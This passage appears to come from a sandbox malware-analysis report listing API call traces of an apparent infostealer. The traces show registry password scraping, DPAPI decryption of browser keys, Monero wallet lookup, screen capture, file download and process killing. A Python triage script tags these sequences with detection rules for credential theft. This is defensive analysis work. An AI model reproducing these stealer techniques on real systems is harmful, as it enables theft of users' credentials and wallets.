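• InternetReadFile.WININET(00000000,?,00000400,?), ref: 00906BA1
• WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00906BC6
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,00920CF0), ref: 00924276
• GetDesktopWindow.USER32 ref: 00924280
• GetWindowRect.USER32(00000000,?), ref: 0092428D
• SelectObject.GDI32(00000000,00000000), ref: 009242BF
• GetHGlobalFromStream.COMBASE(00920CF0,?), ref: 00924336
APIs
• SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0091E037
• GetFileAttributesA.KERNEL32(00000000), ref: 0091E126
APIs
  • Part of subcall function 009077D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00907805
  • Part of subcall function 009077D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0090784A
  • Part of subcall function 009077D0: StrStrA.SHLWAPI(?,Password), ref: 009078B8
"""

# One bullet: optional "Part of subcall function ADDR:", then API.MODULE, optional (args), "ref: ADDR".
LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[\w:]+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

class Call(NamedTuple):
    api: str
    module: str
    args: list
    ref: str
    subcall: Optional[str]  # callee address when the line is a "Part of subcall function" entry

def parse_entries(text: str) -> list:
    """Split the text at each "APIs" header and parse the bullet lines under it."""
    entries, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            entries.append(current)
            continue
        m = LINE.match(line)
        if m and current is not None:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            current.append(Call(m["api"], m["mod"], args, m["ref"], m["sub"]))
    return entries

def base_name(c: Call) -> str:
    return re.sub(r"[AW]$", "", c.api)  # fold the ANSI/Wide suffix (CreateFileA -> CreateFile)

def hexarg(c: Call, i: int) -> Optional[int]:
    try:                                 # '?' and string literals such as "Password" give None
        return int(c.args[i], 16) & 0xFFFFFFFF
    except (IndexError, ValueError):
        return None

CSIDL = {0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA"}
HKEY = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS"}

# A rule is an ordered subsequence of (base API name, optional argument check); unrelated calls
# in between (lstrcpy/lstrcat noise) are skipped. Rule names are this example's own labels.
RULES = {
    "download_to_file": [
        ("InternetOpen", None), ("InternetOpenUrl", None),
        ("CreateFile", lambda c: bool((hexarg(c, 1) or 0) & 0x40000000)),  # GENERIC_WRITE
        ("InternetReadFile", None), ("WriteFile", None)],
    "screen_capture_to_hglobal": [
        ("CreateStreamOnHGlobal", None), ("GetDesktopWindow", None), ("GetWindowRect", None),
        ("SelectObject", None), ("GetHGlobalFromStream", None)],
    "appdata_path_probe": [
        ("SHGetFolderPath", lambda c: hexarg(c, 1) in CSIDL), ("GetFileAttributes", None)],
    "registry_credential_scrape": [
        ("RegOpenKeyEx", lambda c: hexarg(c, 0) == 0x80000001), ("RegEnumValue", None),
        ("StrStr", lambda c: any("password" in a.lower() for a in c.args))],
}

def match_rule(calls: list, steps: list) -> bool:
    idx = 0
    for c in calls:
        name, pred = steps[idx]
        if base_name(c) == name and (pred is None or pred(c)):
            idx += 1
            if idx == len(steps):
                return True
    return False

def classify(calls: list) -> list:
    return [name for name, steps in RULES.items() if match_rule(calls, steps)]

def decode(c: Call) -> dict:
    """Name the constant arguments a reviewer would otherwise look up by hand."""
    base, out = base_name(c), {}
    if base == "SHGetFolderPath" and (n := hexarg(c, 1)) is not None:
        out["csidl"] = CSIDL.get(n, f"0x{n:X}")
    elif base == "RegOpenKeyEx" and (n := hexarg(c, 0)) is not None:
        out["root"] = HKEY.get(n, f"0x{n:X}")
    elif base == "CreateFile":
        if (a := hexarg(c, 1)) is not None:
            out["access"] = [n for bit, n in ((0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE")) if a & bit]
        if (d := hexarg(c, 4)) is not None:
            out["disposition"] = DISPOSITION.get(d, f"0x{d:X}")
    return out

if __name__ == "__main__":
    for entry in parse_entries(SAMPLE):
        print(entry[0].ref, classify(entry), [decode(c) for c in entry if decode(c)])
```

                        Matching is on ordered subsequences rather than exact sequences, so the lstrcpy/lstrcat calls interleaved throughout these entries do not break a rule, and a function that both builds the %APPDATA% path and then downloads into it would carry both tags. To run it over a saved copy of this report, feed the whole "APIs" region to parse_entries instead of SAMPLE; entries that match no rule are the string-handling helpers and can be skipped.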
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 0091820C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00918243
                        • lstrlen.KERNEL32(00000000), ref: 00918260
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00918297
                        • lstrlen.KERNEL32(00000000), ref: 009182B4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009182EB
                        • lstrlen.KERNEL32(00000000), ref: 00918308
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00918337
                        • lstrlen.KERNEL32(00000000), ref: 00918351
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00918380
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 33c999c8fadc810cc7827bab4aaab2a2553b1d2eaf10587b9557b71a71fa7fd8
                        • Instruction ID: 348ee75077916b187ecdb12d147b7e73cd30f65ad643a7b248c16e30b990e076
                        • Opcode Fuzzy Hash: 33c999c8fadc810cc7827bab4aaab2a2553b1d2eaf10587b9557b71a71fa7fd8
                        • Instruction Fuzzy Hash: 6E517D71A006069FDB14DF68D958AAFB7A8EF40740F154914ED26EB284EF30ED91DBE0
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00907805
                        • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0090784A
                        • StrStrA.SHLWAPI(?,Password), ref: 009078B8
                          • Part of subcall function 00907750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0090775E
                          • Part of subcall function 00907750: RtlAllocateHeap.NTDLL(00000000), ref: 00907765
                          • Part of subcall function 00907750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0090778D
                          • Part of subcall function 00907750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 009077AD
                          • Part of subcall function 00907750: LocalFree.KERNEL32(?), ref: 009077B7
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009078EC
                        • HeapFree.KERNEL32(00000000), ref: 009078F3
                        • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00907A35
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                        • String ID: Password
                        • API String ID: 356768136-3434357891
                        • Opcode ID: cd53ba0008fa9e2bcd248f646e2be5520a2b173f3c3a4a2c1cd7a8efbb0c6538
                        • Instruction ID: 202a7ab8d21923f406aa25ff63ceaa4f001ea16e0a957557abc72d31326bd261
                        • Opcode Fuzzy Hash: cd53ba0008fa9e2bcd248f646e2be5520a2b173f3c3a4a2c1cd7a8efbb0c6538
                        • Instruction Fuzzy Hash: EE711FB1D0021DAFDB10DF95DC84AEEF7B8EF48310F104569E609A7240EA75AE89CB90
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00914F39), ref: 00924545
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0092454C
                        • wsprintfW.USER32 ref: 0092455B
                        • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 009245CA
                        • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 009245D9
                        • CloseHandle.KERNEL32(00000000,?,?), ref: 009245E0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                        • String ID: %hs
                        • API String ID: 885711575-2783943728
                        • Opcode ID: b52a9a1fc29d2bf933ba42af9703934b6b7a897f41415b60afa64e731fd7a223
                        • Instruction ID: c614c8d969beb8ab7e8b0356094e7e169f400dc5b040d03d29a6dca41008c3fe
                        • Opcode Fuzzy Hash: b52a9a1fc29d2bf933ba42af9703934b6b7a897f41415b60afa64e731fd7a223
                        • Instruction Fuzzy Hash: 76315E72A40215BBDB10DBE4EC89FDEB77CAF45700F204455FA05A7184DFB4AA418BA6
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00901135
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0090113C
                        • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00901159
                        • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00901173
                        • RegCloseKey.ADVAPI32(?), ref: 0090117D
                        Strings
                        • SOFTWARE\monero-project\monero-core, xrefs: 0090114F
                        • wallet_path, xrefs: 0090116D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                        • API String ID: 3225020163-4244082812
                        • Opcode ID: dbf7a855009d3235cc7003a0a615c033b54f970ad830e0721833071d0637c1a2
                        • Instruction ID: d9bf1648e787942470c4d22c6bd88898548e49a545a3ef04af58e71edf13013f
                        • Opcode Fuzzy Hash: dbf7a855009d3235cc7003a0a615c033b54f970ad830e0721833071d0637c1a2
                        • Instruction Fuzzy Hash: C0F01D75640348BBD7149BA19C8DEAE7B7CEB44715F200154BE05E3290EAB05A488BA1
                        APIs
                        • memcmp.MSVCRT(?,v20,00000003), ref: 00909E04
                        • memcmp.MSVCRT(?,v10,00000003), ref: 00909E42
                        • LocalAlloc.KERNEL32(00000040), ref: 00909EA7
                          • Part of subcall function 009271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 009271FE
                        • lstrcpy.KERNEL32(00000000,00934C48), ref: 00909FB2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpymemcmp$AllocLocal
                        • String ID: @$v10$v20
                        • API String ID: 102826412-278772428
                        • Opcode ID: f45d57b306a72c1725ddda2838c6229a91db14bac7f09bdf41c8104eaa73b20c
                        • Instruction ID: 59e0e5781c8ce5e7ccd8c500d71ead267e92da54dc1e483b87905e8844e4723a
                        • Opcode Fuzzy Hash: f45d57b306a72c1725ddda2838c6229a91db14bac7f09bdf41c8104eaa73b20c
                        • Instruction Fuzzy Hash: 8E51A031A1021A9FDB10EFA8DD85BDE77A8AF90314F154424FA49EB2D2DB70ED058BD0
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0090565A
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00905661
                        • InternetOpenA.WININET(0092CFEC,00000000,00000000,00000000,00000000), ref: 00905677
                        • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00905692
                        • InternetReadFile.WININET(?,?,00000400,00000001), ref: 009056BC
                        • memcpy.MSVCRT(00000000,?,00000001), ref: 009056E1
                        • InternetCloseHandle.WININET(?), ref: 009056FA
                        • InternetCloseHandle.WININET(00000000), ref: 00905701
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                        • String ID:
                        • API String ID: 1008454911-0
                        • Opcode ID: b3bb2dc79629c8254d8602e9c1a9eb130beeafaad17cc75d1b754c5fab6617f6
                        • Instruction ID: 9968854928d0dbadba1d18564a75c1046e9c0a1a0fb74ecc546a33f026504ec4
                        • Opcode Fuzzy Hash: b3bb2dc79629c8254d8602e9c1a9eb130beeafaad17cc75d1b754c5fab6617f6
                        • Instruction Fuzzy Hash: 85416E70A00605EFDB14CF55DD88B9EB7B8FF48704F258069E909AB2E1DB719941CF94
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00924759
                        • Process32First.KERNEL32(00000000,00000128), ref: 00924769
                        • Process32Next.KERNEL32(00000000,00000128), ref: 0092477B
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0092479C
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 009247AB
                        • CloseHandle.KERNEL32(00000000), ref: 009247B2
                        • Process32Next.KERNEL32(00000000,00000128), ref: 009247C0
                        • CloseHandle.KERNEL32(00000000), ref: 009247CB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                        • String ID:
                        • API String ID: 3836391474-0
                        • Opcode ID: e9595f6e81f3ecb37b3965324673adb06bf78c64cb7e35eb39a5a8949ac3fbac
                        • Instruction ID: 24bddb75bfd3d78739572dfa73571841851c7561040f126610b289d8f411df36
                        • Opcode Fuzzy Hash: e9595f6e81f3ecb37b3965324673adb06bf78c64cb7e35eb39a5a8949ac3fbac
                        • Instruction Fuzzy Hash: D501B171641324ABE7215B60ACC9FEE77BCEB08B52F200580F909D2090EFB08D808AA1
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 00918435
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091846C
                        • lstrlen.KERNEL32(00000000), ref: 009184B2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009184E9
                        • lstrlen.KERNEL32(00000000), ref: 009184FF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091852E
                        • StrCmpCA.SHLWAPI(00000000,00934C3C), ref: 0091853E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: fb3c6c20d094fade4c4093e2f404457ab362b1f123e40660376edb7a0d3e2a07
                        • Instruction ID: 533947ede150d2b0726645331956912e08fa32ff8ef86dfbdba42cdbd28e0f02
                        • Opcode Fuzzy Hash: fb3c6c20d094fade4c4093e2f404457ab362b1f123e40660376edb7a0d3e2a07
                        • Instruction Fuzzy Hash: 995181716002069FCB24DF68D988A9BB7F9EF84700F248459FC56DB255EF34E981DB50
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00922925
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0092292C
                        • RegOpenKeyExA.ADVAPI32(80000002,015DB7C0,00000000,00020119,009228A9), ref: 0092294B
                        • RegQueryValueExA.ADVAPI32(009228A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00922965
                        • RegCloseKey.ADVAPI32(009228A9), ref: 0092296F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: 4d452a6a13409ca9b0b60c476952273ddcd22a00797e90cca4de7b434e10d7a9
                        • Instruction ID: c3f540b2f7204743ea2dfbfe5d52957f1262cc59a0f4a21085f9b702c9366ea3
                        • Opcode Fuzzy Hash: 4d452a6a13409ca9b0b60c476952273ddcd22a00797e90cca4de7b434e10d7a9
                        • Instruction Fuzzy Hash: 6001DF79600329BBD314CBA0EC59EFF7BBCEB48755F200098FE45D7244EA7159488BA0
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00922895
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0092289C
                          • Part of subcall function 00922910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00922925
                          • Part of subcall function 00922910: RtlAllocateHeap.NTDLL(00000000), ref: 0092292C
                          • Part of subcall function 00922910: RegOpenKeyExA.ADVAPI32(80000002,015DB7C0,00000000,00020119,009228A9), ref: 0092294B
                          • Part of subcall function 00922910: RegQueryValueExA.ADVAPI32(009228A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00922965
                          • Part of subcall function 00922910: RegCloseKey.ADVAPI32(009228A9), ref: 0092296F
                        • RegOpenKeyExA.ADVAPI32(80000002,015DB7C0,00000000,00020119,00919500), ref: 009228D1
                        • RegQueryValueExA.ADVAPI32(00919500,015EFCD0,00000000,00000000,00000000,000000FF), ref: 009228EC
                        • RegCloseKey.ADVAPI32(00919500), ref: 009228F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: d3101cda4e981063db8dc1f97bb5341023c48f7a8a0699d76a078a5820822b42
                        • Instruction ID: bdeb265f9c9965d50fa10e23b9f15a272c1eb2d739271e2dd07e64b68017753a
                        • Opcode Fuzzy Hash: d3101cda4e981063db8dc1f97bb5341023c48f7a8a0699d76a078a5820822b42
                        • Instruction Fuzzy Hash: 4201AD75A00319BBDB149BA4AC89FAE777DEB44311F200558FE08D3294EEB09A448BE1
                        APIs
                        • LoadLibraryA.KERNEL32(?), ref: 0090723E
                        • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00907279
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00907280
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 009072C3
                        • HeapFree.KERNEL32(00000000), ref: 009072CA
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00907329
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                        • String ID:
                        • API String ID: 174687898-0
                        • Opcode ID: 7adb4c7010751f763dea3d09cd674beb2f90ae6b5ea585ed58d4ba2d5c6da9de
                        • Instruction ID: bbde956c1fef048657e0183616ee9687afba59fb071cfd2487e7da5fa09de7f1
                        • Opcode Fuzzy Hash: 7adb4c7010751f763dea3d09cd674beb2f90ae6b5ea585ed58d4ba2d5c6da9de
                        • Instruction Fuzzy Hash: B0414B71B056069FEB20CFA9EC84BAAF3E8BB84325F144569EC59C7380E671F950DA50
                        APIs
                        • lstrcpy.KERNEL32(00000000), ref: 00909CA8
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00909CDA
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00909D03
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocLocallstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2746078483-738592651
                        • Opcode ID: 1a929056c878d90abff228f66a078299077a7ea10aaf22182fde8db967f9453a
                        • Instruction ID: a5f81e9bf32d8051f91c5e9859116fd18aa6036c3968284b48a8485f3a8b7fc3
                        • Opcode Fuzzy Hash: 1a929056c878d90abff228f66a078299077a7ea10aaf22182fde8db967f9453a
                        • Instruction Fuzzy Hash: C4417C72A0021A9FDB21EF68D9856EFB7B8AF95304F044564F955A72E3DA30AD04CB90
                        APIs
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0091EA24
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091EA53
                        • lstrcat.KERNEL32(?,00000000), ref: 0091EA61
                        • lstrcat.KERNEL32(?,00931794), ref: 0091EA7A
                        • lstrcat.KERNEL32(?,015E8908), ref: 0091EA8D
                        • lstrcat.KERNEL32(?,00931794), ref: 0091EA9F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
